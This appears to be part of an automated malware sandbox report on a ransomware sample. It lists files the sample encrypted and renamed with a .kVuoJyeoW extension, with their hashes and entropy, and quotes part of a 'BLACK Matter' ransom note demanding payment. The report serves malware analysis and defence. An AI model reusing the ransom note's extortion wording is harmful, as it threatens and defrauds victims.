              SHA-512:5EC38627B3B898C49B8BC669E915254BFCB84F11B357E2414F3D6DAC3CEB797E96F608AA9C663C8948BC2A65983A88FA359F1C3505D96592919383414B4854AA
              Malicious:false
              Preview: ]f..Q......,...}g..oV..Y,2........t...T...Jj...."..z.r.......W8h\nY..~.$..0?.....(2l]..._>s....h...Ei..[..[J...xS.]V..x.&.R..hY..f..V.='@........ha.4...H...f..w...p..4...G..=.~#j..l....{t..2...R...>7&..&..a..b'.xW.n..5&.z..'...%a..f...t.g.4).<g.dT.qj....Q.J.N.i.c.n!.9S..(.9.S.......`.,.t..$.B6...L..;.hFt....J#Bh.F.......B.....H.W.g....?.s@)F ..]Z..J...^...0.....XFv..,.2...k..J.k.#...o.....t.Bij....../{....O=.~_..1.....4{...X2..".G.r..z...b}..K<p.'....w..{2.A.f-7.d.../...T.$.1.......D)...M...U....q..#....h....p8..H.=.6._.c....<.(o.b.Jk-.=..2W..;_...5.c..).7...{....q.#Qa.<>.6F....q..M.{..1.[.C.^_#..t.E.8.j.,.}_.7.v.[....T.Y..H.[...0....xZ.._._.K=..3..3.z..\......r...[=w.y.Y./..r.dK=..[..{k....+...A...r..N..L.x"B.-.1..1W..ri...x&9|.1...(.#..3F.yC...1n....#......J..w.3BU6%o".Gq........fGci.e.39...L.\u..G..wj...."....f....y...M..I'&.'K&vry.Y..v.S.....CwEx#....*..:|w...S..n......f?..drC....O#.p.........0;..'1.f..#-oB..oW............
              C:\Users\user\Documents\QCFWYSKMHA.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.82817476178415
              Encrypted:false
              SSDEEP:24:QKTV1RCucUr4+BpapBY3Do8RcloLaAi2j3iAJbaH6d1DwRi:Q8V1JcK4iapBFyc+LaX2j3iOaa7n
              MD5:9C4DFB5B81A98D5F750BE934EB2392F7
              SHA1:C27512291D909651F10DC2DDD9DBD58C28E0C01F
              SHA-256:0359B555DBFE2E54E059B754574C7B771FBF5E2F0CD234052BCD5B53C05ED301
              SHA-512:17EF355A82BDC8FC4A4CA1B2BEA3C51006266C2FB64ACF15924EEDB397518D966A57674409C80ECEE0D6A1C8D5CE409BA9A924B56DB3751A9177634CC79D4C7F
              Malicious:false
              Preview: *....F>W....3.5.;pl..'...~..O..2....=s:......!U:..X....Y..s.b.p.n...U.-...D..2F6..L.6...)..T...LP.C.2I........t.&Fs.9g.j.M.M..d..D.N6.0n.;...m.`f2.t.ez........p...{UQ*^../X.1..w,.K..~.k.(...../].gn-.k1.X..B..VB.3...Qu\B....=...L..p6...IAH.{..uZc..]...C(oH.qY..1..x............b2k.$(..~.u.|;<u.>6.z.^..n.I..D2.|...d...o..B,.v....7...NB.T$....&.l.dR.2.b....91h........C...$..<.)..f..;UU.\._58.d.g.F..$...t+qNJ...;.m...-....Y...J'.?.1....Q.H.;...sY.K.]0..G.......M.x~W...6.......fB....._.._....I..$............8.lh>....j5 .<..a.Z......E.{.........}.<....K......X.e......f.....=..~..Du3.}9.Q5,.E.25QE.a\F\.+..eZ.S....c.S.k.Py4..gs.r-..%......].....8....Q.g....0..h/E..i..r.V*}.uN.n:........eO^."...+w..a...m&.F.A.v....g.(&!..Mw3....;...W..H.....).lM2 ,....,.....|.."...VU.I.X.Iu).....4.............<.0...O.eG..Ig..5!..6...h.R....4.D.>.?P...I.F*..B..`r.w2.1..%+Vc.`.{j..V.....Vu.J.5_..\.Qn. ......C..%O\..VN.'8.aO-<.wDR......l.N...K&D..y....N..f..L.M..Q...4
              C:\Users\user\Documents\QCFWYSKMHA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.828649300639011
              Encrypted:false
              SSDEEP:24:UF2luPR27uqH0p83xuCTdSrN2r9oEt/LIJIndmoiM:ag95ECwUWEdK0dmO
              MD5:9CAC23E7DD88F8368082FE917496402E
              SHA1:A670EBD8FEFA622ABD3A7047E4C920DCEB3E8CB9
              SHA-256:187B163DC59AD117CB7FACBB8FC1D1B91552807FB929703C22E01ED275186151
              SHA-512:8478C98EFA89DE9E193658A7F6D6C7D44257E4E999CE1D5C00AAF07ECA7C556A2EAD679034CA6D80DBA6D168483B1503466FF1626B60C976E1EB8604331B2E7A
              Malicious:false
              Preview: z.&.>.z.V.+.....[Wb.g~Y."...'..e.....)6.l..&...k..fu...F.i..... ..6..q....1...m...D6...Q.....1....4....j....Ht..:.....~J........"A.X....6`....[5....o^.9.#.9.Q4..|X..$L....0..>...9....Y..;.L...v..|...^.n..%q.....4..`..b.+...#.\.Kb.K.....S/.P#..W..MF.c.r.6..Vq..B./.Q.:.Fe..Q.yo..F6.%..&..silYFU..?.&..b..`.e.Y..q..h.d......T...s3.....ti1s2;..Y}:...(mZ...T/...Tz...g..Vi.".)...%C.....,\.,%..uq.`..U.u.z..#V.|..B.#..[.C...0......).$.".q`..(...\7.9$6.....R..)'.................#.:...2.1m.7..S...].a..T.&..N........#.6r7.#.l..K..t8.".x...}2....h.lW.|..x{.P......E..F.K'...[.P?..........=..e...UY..l?..9...O.6....#au..x...Mc..p..5N...8.[Pt...<tL3:.R...w._. ....0.).{JGQ.OL..(..u...dO.....L}...OO!.Gp.cT7...*.@4.b.._.........r..;r~.6.<n9......P..6...7....eb...^.y..Y.....&..[..n.t?....%.#/c9a..O.qX......N@.o.....!6_=|..x..g^U...fc...../[...>KoZ...F4n...z...Y..fG....c..j..M*(.a[.o.k.5.z|...S..WL.d.....@......@.._.b......._..+.......!s.EUn.h-.....R.M.B......b..[...Y.
              C:\Users\user\Documents\QCFWYSKMHA.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.840254160343959
              Encrypted:false
              SSDEEP:24:VsVPZ0boE9JrPUgD6z3HmcmocQRPglAemSu2l8zfU6zcUbIF:KP6bo+bUVtmJQ2lF8zcWb0
              MD5:8EA625F5F076A20400D57F6FD51A2A0D
              SHA1:57DAD72CFD647AC7A75851EBB7AF1567D178D94B
              SHA-256:E1E0C77D1EF4B3CCA88BCC71652D332424CF1CF4140E53B728ECC973253F3DE7
              SHA-512:0859F0741228F82268171E0FD1CDB9604717B743DC18E399B5A8635691E26F1EB07A70EB5F90BCBED394BCB479F4ABDDB6CD0CACAF4BE01E29A11EBFCEC3D7CC
              Malicious:false
              Preview: ......r......._p..+.r~5..b..]....'e.ke..q...g'...n.&.,m>r8...h9..~.J....{>M.."o\5....p..D..b....Zm.1...z(lN5.m.>...o`.E..q..E..0.6x[..0.........Q.G?...h..<.2.._...w@....!\2~....`6..5N.....=......wslJzd....,...9......<..Q.......&M.5....jA`....!.....^..L]1.7X...r.X._.=..h.EO.H8f.."R/.3.y_.A.QZ.q._~j5w....G.../...9.F...I....;...Lg..a.N...K....:.*....E...7.<GP...?...a...beF...wMO<......0..:>g.Y........}..X5..."..6.....D..K.v...:...]..9. u......P.Q4QlmYX.}.....x..\.T}1.%.&.m4?b...0......`.+.Q|R.:.S..I.&b..V.......[.....7@k.=y.8<./V..se.&.....lo....TiY..8h}U...-.0.i...4.8.z[z.>.).2o...T%rH...R..Hmy..l.....0.....>H..+.tN9S^.........x.....j.....Ub%..X..Q....ln..Cu.........4]..0....eD.]!.L..5.#.'T.....L......&=^...%-....c\....X.1.....&....I.=...?s=.......B.....Y.....w.3d.>./$m..k&..SV.\.8.#..x".j......r.B.%A.......{.|xTv...Jt.m!FF..(H.;....9.E&.N..<.Vg..R..pY.FO.....,9.....VJa...-....?w.u_;...7sNl2... ...ezn.C....{.....dMn...........3 ../.>7*
              C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.821885050469242
              Encrypted:false
              SSDEEP:24:Bdcw1bisVOA8GUtbu3FxhmxIXMP6xcTAEd0oPkIv64KceBe:z1gKKe3t/xMA+BkIv6C
              MD5:431F12D55A65362EA579E384E09AE97E
              SHA1:DAA1C86E53E803E7DE831FA1917F5D880F8FB40F
              SHA-256:E773BFB4D35F058C38BFB8FD520D01CE0F4A0E29F1951B177D1DD8098CF74BC7
              SHA-512:AD6AD714FC594364031908841EF21DB2A12BC2454FDB2D4120A6FDA3FFDD0EAD3D4E380E73C36BDC17FD043D4E8D0495E52F9506174A18D630C048DABFB95038
              Malicious:false
              Preview: ..c.p\x.J.........v......yO.N.g...T.I.....b..m-.n..'...| s....u4e.(`..@|...@..a4=&...L...<......z..*.b.Xx.<c..9.s.>.T7.|.. .S?.`..9.=e..6....I$2x..>/mxz.@..........._f..W.g.zP.c%........1t.A..(5...,.....;M..2.1q........h.g..G#....;c.x...to..\..!.Y..nt..x...L..T.Q~.........0~...zn.....1B.T5....6H.X.9lq.UY...._.T...y1.........1...-P.h.#..._*.Q0...s5..B.M..pnI.....9.K.nu..Y..:..@H..[PBM.M.C.H.YT.......]~.....f.j...[JT..T.i.I...q3..-:...'v.f.!.T.b2.3&.7..?Er.:S.L.8.9..O.....Y,\.o.......=........%n..xeO&...$..tB.......4.-s..0..N.3.GN...@^.&#,i,.c..w...%.U.ki........O...x...(ym.}P...?7.../g..>U...2$.).P.g...!..+...g.o1...!...!........K...p0P.n.p...NBg....@..\....]..u{E......;".PIp..c.......5T...e..[......<...X...z..\.J..zd.\.>....{9..|.....R]..$...'..Dyw.>!........O.j?.9.KX;.\.c.9.....*+.N..Z.f.,....j...`....=.w..3..r..Y.pj....#.\.'.dT..Z...I).c..........~.'.{}H....v.e0..V-..........3_K..@..)E.....Ou..{....sU.z.+..l%...F..m.U...5.U!....N.7..6.O.
              C:\Users\user\Documents\QCFWYSKMHA\DUUDTUBZFW.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.866398773385924
              Encrypted:false
              SSDEEP:24:kM6oFqIVH01cMIlXlimPKXenRQ7pGkkRCJ4DaqM2EHU7:kM1FqWU1c7lE3YRGpIRLMTU7
              MD5:3DE3423EE9CCBEEE9BA11FD02AA80084
              SHA1:21EA12260F8B35861505792CE033CFA65C9763E2
              SHA-256:42BCB3EC6F80E0719EF5777DDF7BDBC2C2A2E69841CC80E51449C8121DFEB569
              SHA-512:016EB9CCD4ACF102E76740CD48335772F1FC4D30E240F037F6DD9E21E678E4481E46D822E5786A1380A6E9536ECD14C53759934794266EE43575C0B522883B56
              Malicious:false
              Preview: ^.\.p..8.....W...r..AYp...k....F..... ..hn^".e.&..8...D..N.i.Xd..T..ID.T#/.....@.d..V....N.....z/.....O.)....E.94vU...:^.8...I.E.....LQ..7...r.rd.....n..3..RMG._B].......0...IM......V.=.^.d.T../.7.0....9.....~...K....x.W.,s)..1xTo+..O[.IA%.......*v.vc.D..Rq...C.!...........wYr..$...vW.A.........3.(vA.4........]2...|...Se._......g....g.....|'...P.;.,..eda:..PyQ.......N.V.S:..b.!..*...rz..xjo...2.l.8..*.....f..P.(.DQ.i....>......<.o.=O:..._.x....tn.<G)]...E.}.$n0SDA.-.H...W`%.....qW z"(n......./.Y.hYqD...b.m.:.1.._....n.}...@(*....5..`......"2~.R.R..O.>8%.{...).c.(.4....@...z....s)2.X.......Y....Q.........D.vG......`0..y.I..m.D..H'!6....L'X...1.y.I..t.s.$......*..._.F.f..Q..<....=,!?.r...}.3.H..i&K..dU.<........Z..5..7YL......\.`n....O.E..O..l.....\.Ag...E.!..7.....xL..*q.:.J..k..F..MS....jB@{1..CN.=^o.K...D.....;...+.<.#..M.(/......ym....R+.*.g*R,..w."....bj..2~..*.u'.y.%.....X...9.f.\~A.~.:.hid.....U.b.&..xP..j....^.{qC.E".S...f
              C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.829396273993234
              Encrypted:false
              SSDEEP:24:4JUQoOyCeK5bMrNuntAH0VIJn4DEQspjHuBuZmwkNyrT:dCeDcntZc4DEQOKBugwkNy/
              MD5:102116B7EBD67857A5264C691A02E518
              SHA1:F111B830E332E9F93F64ADA1B55A88666C9D3266
              SHA-256:B444C099AC5237083AFCE3D72A759756466D97C539099D9005ECD8AFA9EE9DE4
              SHA-512:ED8933ABFAE1088FBB1CB34BECEC9D46B2519D5DDAA2266B9148F9EFF1D5C7D7ED80610DC67565A2910A5AD33CA6C1A625CDE629834B1C24490A05591AE44F4B
              Malicious:false
              Preview: ....h]3L.$&......Z.....i.Q...|N.ejBQ.0#.4^....u..>k'9(.q.H....Q$9.My...i.hO../.^Es :._...N.zn.m.>m.^..|....v._..j..:;..HM...?.F)....}...Ho?p...@9."f.......IG.....j...&......{...D.7..U.%6...Y/.3.3..H...D.....e.....P..+g..K|'...\=.w`.}_wG.l...rv.e..RJ.5..|.<.#[..."..r._5Z.P...Y..[../.js...\..s....')...#D.......Q6(..n./"h.`y.P5aR?......*......`.S.#U..r...i.*..y^.......9....d.?Z.C~|..$.'.{......v.\+Z.q..p..4.)..x.w}..O.g.*w....+.<.ER...6.N...y..B..I...r..,..`...Z...#O_ot.m...P.3....z'....}.j..U..#..../'..s.XX;m..yIJ.N'?....2^.bV.D..<N1.......|Ap.!m.-......3c..Bi...c..%.B.....:..nt^.t.7D..hc.*.....P...Y._TN..j.....Ho."4.._B.3.3..N..>.6.e.........P|47...5%......8.....C.AK{xW..NC.C.{...P.9.Q...bT......Z..j...Q.'$.Z..,.d.>.k.X.4L'74V4..:.....1..'c....-L.`.?..W.H..;.W.3-~^XC.bx\...-....2...X...|.9......./.Z.}/.sps..'8nT..u3.X9...5..*8e...l4..Z....ab.<aM.I.N.L.^:...LY.3c.....{.i.8.......s.68+Z!......<a.p.....y$D.x.\... ^.+g.."."... .e...X..o.....
              C:\Users\user\Documents\QCFWYSKMHA\EWZCVGNOWT.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.820670909713017
              Encrypted:false
              SSDEEP:24:wZNcW+mfsefLUtGIz93nryFBXBxoeKl2/WhQ+PZaWYyRHuupx0qj:wZl+mfseUYGVryDXvsl2/0NAWpHuupxt
              MD5:AA73BCF812211F00BB64BE4E92054DDB
              SHA1:FB5841C8FA452523EBAD502C71E627AEA0109889
              SHA-256:A7420F7BBFA5BD2B6E6BD47F97E253A31064D36E8583D0FBF622E482B9DA8170
              SHA-512:2C6AF4F96531452D7C8362E09F45FC0081994F983C5D2DC17C58A09202E633DF28F9EBFD8AA4E191DA60D70A54240080E2FF6AE5C4AE6122F496E1D2AD531560
              Malicious:false
              Preview: .k_.MD.P"h<......>.P5..-..|VF^.b2mI...m...<u\x....1.\J.i*S.[.S./".I...e..a...DA.'..z.V.)...k..gR.$.9.k........E/%g.Q.cb..5.....O.b2..VE....T.....R.wg..t.bQD>......nO)...o1..|.)m.8>.U.9d..d..z..p".H....PS....<r...9x.+.@..]=.FF.7..{[..]<..36.SE.....La....%..6.]...U.....hB}.....I......N.8!l.Q*...D.S$.g.l..t;.....Z..Q.Cs.z_....6...d......YS0.u...pI.t|jL....q.. .h...44r.1.*..4....R.J.)z+&.....9@.....g..(%J...x.K.....+U.6..Tm.....5.....I......!...w'...CR......yund{.#N.|$HNH{#/..Q.....|..U....M=&...Z.kL.El..N....rh....U.X.k..s....`..[.|s|<.p........QR.v&y...h.U.X.d%....}...>@.........`>..p.}J<..;.2.9.,/p...X.......PrH/..../.q,.>..W.9jo....a.....C.>..;..5&>..A.........*e...U.{g)$q.|...T...2...gY..W.........N.R..]?.L.ylP..|.c.k.m.8..3,...N......?..\.c_.nr>.....Qp......<z....R..\.~.g..g.....}^.s..Ag....~.[....s..EI6{...06... .../H.[...o..P^....N..+.b...t..G......Z~S:..?ivh.J..U7.....w....$;@.A9d.=_.$.OR.ME.~.......K.<F.....I.".B
              C:\Users\user\Documents\QCFWYSKMHA\JDDHMPCDUJ.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.856370724479703
              Encrypted:false
              SSDEEP:24:5PNvdFqzTCTz6QckO9a7Nu/hYK5qGH1pEnWJbvJuXjZNUEsg:5PNVF2guQckr7EaeEncIP
              MD5:DA5EBC50B69A7AA447F66738C08C52E2
              SHA1:6865F466C5CD572AA4EC5F8E8956DF94C964D776
              SHA-256:5AC3268B1AA076540A5C3188DD13D0DF33AE00D9ABBE0DD0862F66310BD829C8
              SHA-512:D76B7B52456AD458F0D9A39580A20438FFB5D1FFE06E9F072FDEF36647862B50CBB70EC64507D9D7630FAB57A30EA03DEF32AB5F3DCCC83391857C19324659F5
              Malicious:false
              Preview: ..~..g.....}..N.'..nD..:..+a7..{.....?.tZB...M..Q...6..x.t;b.......h.3....p.k.i.Yf.J#..........I.....J......Q4).;.....]..[..........de...,).`.D\}d.20a.....=O.... .1.'n.}.......#.......#.gW.5+..V..*M.4ew....qj}/.....e.)>...-X...H...}....).3.Yv..O.*..z......%."..2....2@.......I..o>.p.S1..M.(...{w...)..z.~...W......>...'6.7*....H.."L....J_C.....-........B.\.o..G..u.@.:V..?.....x.R....V..#.P.W..['..k..|..2"....[d..,1.._.pG.( ./;...`..S}.!.9N...V..r..c...SS".V...rE.`....SZ..w.,tq..hB....Iy..&[.2.N..I.J .E,...CJ/.z...tFm(9&...<=...........g.o.>?.^:...DYL.*8z...h}.,...{}XN.|$9...A.........M.h....C./....s....] ...}..z...@...p.........n...>2)..X.$P...G...v...../q..T.......>M3d.....{$..44......C..&......$N....O._.......?>.vK.U.*...w...w..[..1.8V......]-.....y....|@=...I..J.s.PT&...tvE.|i.#i.z.'.T....).t.+|.F.2.9.>.vT8....UA.T.&...KW..~..%=.EA..G.K.t..}........&|Y.+..~G....k.h.._.]L..(.Og..9C......2:.F....*.......5..F....<L....q]....~....<\. +.4..(."..
              C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8382320358659605
              Encrypted:false
              SSDEEP:24:wl+tYnZIul7VDkBiSBKJPTa8J8BbG+IJl8NaEt1Vr8qcpuJuT2QQNn:NtmIhRBfNBbG+IMlvcr2Qy
              MD5:B2463A2BA922E89780BB3C55686017DA
              SHA1:39D483044A20C3ED3B8D8706E3898424376E0E98
              SHA-256:6912B5131177F53FE98CF29492990A88A25F6C19B3FFA86C8F90B37E187BFFAE
              SHA-512:9121AFB50F004980163D2E3734DDD862DDF2F63CBEB5AEFA35F156E62A9A8408DD79728AA2E41E4C797337AA90B42EB3A9E1313533B21503A6C07AE9CC19CA38
              Malicious:false
              Preview: (T..#......j....$.2M....."P.&>K...f...XB..Y...*;V...K.....A.^#.0D......_....-.@h.d.......aT........2..m..!w..y...8.^..._.....#Ov...E.[..k.?..^.)0P...'z.......,.~!...y..YH_..V...l.g....}.f..{...u&.'U-E..!"..[..D~..w.D..:..gVE. I@......x.\!_.....kcM.....6.c.Wy..',L...V.*g....]q^..4d!..4.E...+........[I'.......c...|.;....{'..iB..r..T.....C;..."..dW...1..X.`H!..........K.s.^...Jw..v.A..../....y. .....u..sY...0...Y.SXq......L-..E.5D.....|....t..!+....Z.!.?Q...Yr...6..0Hk...j.#.$V.*@5jB.......D./P 1Jx....h`....-Ng6.....}...Z..O..2.@..c`[...%...8.."....)@.....oB......*.'H.'C...D...m&...#.......H.r.....]n...!..Ic.1....?..lQ..nKF.J..i.k.... .t]....}d.4..1b.z...J...p..H!...^.8..|...."..m..~.......k.=...o.....sKo]fT..Z.....hv.L..Q.=.Q.n@....6.+...8E|.\...el&.....%v.Y....+g..@.O..?......Oj....0...4...X..3.X..|...\xz.sJ...O.Z...x..u...O.P.b~.;...|.{.............)9..?1..].V*KlphUg...m.*.>.2~...<..^.|s.5..{....%..h....b|........$u......E.A.UCp.
              C:\Users\user\Documents\QCFWYSKMHA\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\QNCYCDFIJJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8476350668665384
              Encrypted:false
              SSDEEP:24:S+wSXjyMu+IaKERibqIpso3h5Nv76ztjf4dBM2DzEQxXy:fwVMkawhnv76NW6M/y
              MD5:1FCE5FD4B6CEAD043ADADD14AA0758E8
              SHA1:25217ADD6A0D875070FFB81D7987A4AAF22CE8A4
              SHA-256:5CC6AB5DCB62DFFA8A4C958B89A952BEDD988A2BE1C76E0A2658D1335BA09CFD
              SHA-512:EEE0FE9FEACF5859005311A6FC5CA2EF7980A3DD653A8D0532CAEDEC40E6DC1DBC9922615D1BD193306733E61B4B38C082E66491096B92C20F11BBB5FAA72E19
              Malicious:false
              Preview: Gz..E.K]+...?8m..M~...-r..".H..:..]...q...,...O...V...f.....e.}..D.h......<3P.......h.f}".wJ..y..w..@.j....'..Cav..@../..A.[aw#O0....A..#F..l.I........|...\...F...u.L.N......K.5G8..g..[.}...k...Fq..IKy.....N.M.Hk.P..T.dwT.).af.?Z{.,..0@Hr..E.j....`....v+..De.dM[.....|rko!..b...=.C.0}..l..2.G..}.5........Q..h....X&E/+.H_}s}...a..tb..R{.....j!Ul.....N..B.5...j-.O.K.1|..Y.p..9.....FNm..Qs...Mo.n.r.+7|?.L...?.s1.q/.....0K5...~a.fm0....B...Nnb%.#J.*5......|.g6...$..;....ip.w......U.o.DRN)..|u.@..........U.9...%.Z...H.chP.f.tB.....d......&..w..m#..{.../...|...;b.so .fX_s./o./..J..-.5W.]>9.H......U....(.5.....5.=...nc....9MC...f....@.gv.D~Bi.}...'...-...g.5yr.;....2.z.....:X.L..'.D.s.T..[.-$..tC6.U.1;..}..q.]p!.l.B4p6...:.>..'...7.bU..2I?..8..r...x..4..*n....Cq.53J..(.W...].<=........~Pj..R.*.!...F.f.......+.B...:I.,7c..Y ...3b...vt.?..t....q.h......y+.G?W...S2.:....xo.....QfN....s.c.....R..wI.&.& =..N......k...DHml....htT.e...,z.z.5....&#.G.*
              C:\Users\user\Documents\QNCYCDFIJJ.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.822464803985658
              Encrypted:false
              SSDEEP:24:cXZdmKC7RabxBOr98fSsoLh80LbEAp/2RJpquLyE09vWW5FCiq:qoKxe86sod80L1uJsE09v1DO
              MD5:6F88D5CC12ED2184A483BE35E95D457F
              SHA1:D774E0B8154968F892AC69451009D0357EC264ED
              SHA-256:66AD1F54629B378F31B8A78B3FC9444B44A6DECE1DD21584DB82EF298D02C0D6
              SHA-512:B3467006CC2216666984E075EC40512EEC4D1D8E71FC64F41E8473D9AC60C3CE97AB9D367D6A92873FB9B5136E273A167C4A53DA054F28F60C89D1832027356C
              Malicious:false
              Preview: ..I..9n...5..X~.."#L.Z.\.i2...A...?l{..I..a.......I&....\....4...C).2.a.3..<o`..2y#)k..k.k.$./........G+'r....W.Ft...1..=&....-.cp`.8Q..Vjv.1;..U..|.aX......P[.X.4:k(..P.JL...R_T.iP...Y...g..y.....B_TP.M.$.m....fT{.b.....!u{...f.....j....S?MC..f..........{[5O.....A0..b..b.nK..wrI.&..-1`ciq.'F.Ln.%Kv.....Y.G.`....b.j....1}.1\<.)._.*....b,.)d}....,_.....G.P..m;.......y.^c]......U....m...#.......N..........T......y...j..... .U9S.....Y...x.......%...]...e.L.h..X.{..K...A*.j...9([..t..._=.5.`..m.qU3....df.Lz..[.\?...........!.\k..Q._...!r.+.+..]k..A.......{$+.L..?C...\'.k')...W....6...K.P.,..G~.#..,..h_v.e...i~-k..G....|i....t.......b..G.'i..*..).P..Ir........p/.S.o'5...4E.f.k.HU..x..Yv..g..tI.4....."..O..8..Q.q..I]>..(o.w...........dbj..o...C.....W...n.{.U.\...{`..O..\..@.p.....K........jb.....|......W....U......k..~..i.....r......M!p..#=~.. W.0.f..@I}.h]s.,...B~....../.E..k..B.P..qs.l]E..0..0.*W.SP...z..Es..9..E......!.{..'9.=..<..
              C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.802456843108397
              Encrypted:false
              SSDEEP:24:vFmbwLU9sHGr03wNTAyjvUSj1kATRI8pbc6+L9vhHiPMG/YO91mi:vFDU9sm4k8y7UQTSwbcBRpg/YOzz
              MD5:225BF1C3C68E66B122A22C6539D35DEB
              SHA1:E4F518C1901EA8F565EFE1FC040D05314BAE19DC
              SHA-256:8155119507DD157A21A12DBED34628FE94A72FD4DAAC8A3607836755FF9C590B
              SHA-512:6BD606A329FCFC2C4B70CFF90614564598575F0D319910B94786718C46EEA803DC0832144D38F84090BEFF3AD4134C4AD4D17B7819241F4251378F2B644B89E5
              Malicious:false
              Preview: ...Ln..X1.L).....F ^.....X...S..$.o.6.i.8....u+2]....A.a.[.p.......t]K.sJ...Yhk..IF-^}......_....p..o^.....,.......~......(.|.;.....?$%.U*..+.]2........e....."*x(.F7qF...r.Y....Yt"7..E>y.?p.......xa>.......0 .......F.&.^.e.H #.....M.L~...E...n. ......>..h...i%..;.K"b....VO..7.:ILC.. ...N...|A..G.....F...4lop..../..,..!JO~C.<ba/..}.JD.'..q&Q..$.WtpF.Nt.y...$1..<..k...P.....o......u...f.].._...<..k..%7..M".Q..O.......c.. .MT.JIl...F.$R'2........l..:....$4.......<[..C...T..r..].uD>BG..F.%2.h....uG{...w....9.$o"....$....$..H..[US.........9q.].TP..A#...3.O..N..A.d..1....$...\Z.i....@.....LE.<4|.RU. .(t.X.V.|%eJp.`...v.....D.5z.......4.e.ZP...,..f.U....*......y.o2...A.H........JK..=q...F>..].~...M...Q.....}a..J4.....n..R{.V.+i>c..Yx^v.g3.;.R....)Z.,....a..w..l.....(.~.....}...o.\.<U....F..Da.z.Ie.,]..M...%Ic.E"._.w].Nj..~.D..1E.D........6...w..Qn.}Z..(..!]..C.B...`...;Xo.V..p.h...F.Au...b...^...H...b,Ug.PG).z42....j.P....[.....Yz@k.
              C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.820628807764753
              Encrypted:false
              SSDEEP:24:sRui0UjuC9dG7tW2RcGqKOWKKfluYcQOa9TBX+jmtnfRdm0z:sIiNuBI2RctKOWdlL91BXaIf60z
              MD5:5CD31818327B3BD2DD66E07B21699928
              SHA1:C881C17735C684125EB34ADAF9AAF751DD6E41BE
              SHA-256:FA5C57DBF58FB6B0D4DF8429B18CA83881288615C4FE39E55D0314E2DDD68118
              SHA-512:BC697EDF69D8A683D711DF577493071F4AF55E8D2723100C4CD95EB050BF6AA5701BF2AC2DB080F95E8CE55048CC764DA43568FE0D0B17E924B6FB90E6AC49DF
              Malicious:false
